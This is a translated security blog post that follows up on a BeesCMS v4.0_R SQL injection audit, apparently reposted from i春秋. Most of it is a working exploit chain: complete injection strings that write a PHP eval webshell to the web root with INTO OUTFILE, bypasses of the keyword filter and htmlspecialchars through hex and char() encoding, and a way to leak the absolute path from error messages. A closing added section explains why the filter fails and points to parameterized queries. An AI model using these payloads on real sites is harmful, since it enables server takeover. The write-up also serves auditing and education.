further thinking on the sql injection vulnerability of beescms

Posted by tzul at 2020-03-26

Note: original author 0h1in9e. The article was first published on i春秋 (ichunqiu); reprinting without permission is forbidden.

This follows on from the previous article, [Preliminary Code Audit] BeesCMS v4.0_R SQL injection.

0x01 Preface

In the previous article, the conditions for and causes of the SQL injection were introduced in detail, but the discussion of how to exploit it stayed limited and did not get results. In addition, how the single quote gets into the statement was not explained clearly. In this article we continue the analysis of this SQL injection.

0x02 A feature of MySQL injection

The previous analysis showed that fl_html(), which is really just PHP's htmlspecialchars(), mangles the payload, so the shell could not be written to the target machine. A feature of MySQL gets around this: write the shell part as a hex literal, or build it with the MySQL function char(), and the restriction here is easily bypassed. Method 1: hex-encode the shell. The statement we use to write the shell is as follows:

user=admin' uni union on selselectect null,null,null,null,<?php @eval($_POST[a]); ?> in into outoutfilefile 'D:/xampp/htdocs/beecms/a.php' --%20

The hex encoding of the shell part is as follows, computed here with a short Python 2 snippet:

>>> '<?php @eval($_POST[a]); ?>'.encode('hex')
'3c3f70687020406576616c28245f504f53545b615d293b203f3e'

The injection statement then becomes:

user=admin' uni union on selselectect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b615d293b203f3e in into outoutfilefile 'D:/xampp/htdocs/beecms/a.php' --%20

Remember to prefix the hex string with 0x, or use the function unhex(3c3f70687020406576616c28245f504f53545b615d293b203f3e) directly. Then modify the request in Burp Suite and send it, as shown in the figure. Checking the file written locally, as shown in the figure, you can see that the webshell is written at the same moment the password is dumped. Next we connect with China Chopper (菜刀) and obtain the webshell successfully:


Method 2: use the char() function. MySQL's built-in char() converts its integer ASCII arguments into a string, so the webshell written above can also be expressed as a list of ASCII codes. Again Python does the conversion quickly (Python 2 REPL; in Python 3 wrap the map() call in list() to see the values):

>>> map(ord, "<?php @eval($_POST[a]); ?>")
[60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62]

Our injection statement can then be written as:

user=admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) in into outoutfilefile 'D:/xampp/htdocs/beecms/a.php' --%20

Both methods bypass the sensitive-character filtering and write the webshell normally.

0x03 The absolute path problem

As @zusheng commented on the previous article, all of the earlier tests were local. One problem: locally we know the absolute path of the file, but against a remote site we do not know the absolute path of the web root. Is there no way to continue in that situation? In fact, if you look carefully, an absolute path already appears in one of the earlier figures: the Burp Suite screenshot of the injection statement being executed. So what we need is to make MySQL emit a warning or error that discloses the path.

For example, you can issue the shell-writing statement without knowing the path, or write to a path that does not exist, and the resulting error reveals the absolute path, as shown in the following figure:

There are many ways to do it, and there will always be new discoveries!

0x04 Thinking about the single quotation mark

A comment on the previous article asked about the single quote: if the htmlspecialchars() function filters single quotes, how does the single quote get into the injected statement? To answer this I consulted some references and tested the function locally, with the result that by default the function only converts double quotes, as shown in the figure:

So htmlspecialchars($str) as written in the code, with no flags, leaves the single quote unescaped, and that is how the single quote gets introduced.
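To make the two observations above concrete (why the hex and char() forms pass fl_html() untouched while the plaintext shell does not, and why the single quote survives the default flags), here is an added Python example; it is not the original author's code, and it models PHP's htmlspecialchars() in Python rather than calling PHP. The payload and its hex/ASCII values are the ones from 0x02; one caveat the page predates: PHP 8.1 changed the default flags to include ENT_QUOTES, so the single-quote behaviour shown applies to the PHP versions in use when BeesCMS was audited.

```python
# Added example (not the original author's code): a Python model of PHP's
# htmlspecialchars(), which is what fl_html() in BeesCMS wraps, applied to the
# three payload forms from 0x02 and to the single quote from 0x04.

# Constructed sample input: the webshell string discussed on the page.
SHELL = "<?php @eval($_POST[a]); ?>"


def htmlspecialchars(s, ent_quotes=False):
    """Model of PHP htmlspecialchars(): & < > " are always encoded;
    ' only when ENT_QUOTES is set. PHP before 8.1 defaulted to ENT_COMPAT
    (no single quote); PHP 8.1+ defaults include ENT_QUOTES."""
    s = s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
    s = s.replace('"', "&quot;")
    if ent_quotes:
        s = s.replace("'", "&#039;")
    return s


def to_hex_literal(s):
    """MySQL hex literal form of a string (Method 1 on the page)."""
    return "0x" + s.encode().hex()


def to_char_call(s):
    """MySQL char(...) form of a string (Method 2 on the page)."""
    return "char(" + ", ".join(str(ord(c)) for c in s) + ")"


def survives_filter(fragment, ent_quotes=False):
    """True when fl_html()-style encoding leaves the fragment unchanged,
    i.e. the filter does nothing to this form of the input."""
    return htmlspecialchars(fragment, ent_quotes) == fragment


def report(ent_quotes=False):
    """Which input forms pass through the filter intact."""
    forms = {"plain": SHELL, "hex": to_hex_literal(SHELL),
             "char": to_char_call(SHELL), "single_quote": "admin'"}
    return {name: survives_filter(f, ent_quotes) for name, f in forms.items()}


if __name__ == "__main__":
    # Default flags: the plaintext shell is mangled, while the hex/char forms
    # and the single quote pass untouched. With ENT_QUOTES the quote is
    # encoded too, but hex/char still pass.
    for flag in (False, True):
        print("ENT_QUOTES=%s: %s" % (flag, report(flag)))
```

The takeaway for a defender is the last case: even with ENT_QUOTES the hex and char() forms pass unchanged, because HTML output encoding was never a SQL injection defence; parameterized queries (or at minimum strict validation of the user field) are the fix.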


0x05 Summary

A seemingly simple audit actually touches many areas of knowledge: the PHP syntax, the MySQL behaviour, finding the site's absolute path and using Python to speed up the work, as above. Most of this comes from steady accumulation, and we also need to apply it flexibly. The MySQL features used in this article and single-quote injection are very common, but without a good enough understanding of them it is hard to audit a system successfully. I hope you have gained something from this :)